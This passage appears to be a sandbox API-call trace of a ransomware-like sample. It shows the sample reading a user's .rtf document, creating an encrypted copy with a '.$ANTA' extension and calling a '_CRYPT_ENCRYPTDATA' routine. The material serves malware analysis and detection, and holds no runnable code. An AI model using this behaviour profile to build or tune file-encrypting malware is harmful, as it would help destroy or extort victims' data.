RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.765] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\hujutg60c tddwcmy.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0082.765] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.765] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0082.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0082.766] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0082.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.767] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0082.767] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x43ebed0 [0082.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ebed0 | out: hHeap=0x1780000) returned 1 [0082.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0082.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.769] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0082.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0082.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0082.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\HUjUtG60c TddWcmy.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\hujutg60c tddwcmy.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0082.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.771] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.771] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0082.771] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.771] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.772] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0082.775] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0082.775] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x10000, lpOverlapped=0x0) returned 1 [0082.778] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x6ff1, lpOverlapped=0x0) returned 1 [0082.779] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0082.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ff1) returned 0x49aa010 [0082.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0082.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ff1) returned 0x49c1010 [0082.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.787] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ff1) returned 0x49aa010 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.787] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0082.787] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0082.788] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0082.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0082.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c50 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ff1) returned 0x49aa010 [0082.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b90 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c60 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c30 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb420 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16ff1) returned 0x49d8010 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.792] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41acd40 [0082.792] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.792] RtlAllocateHeap 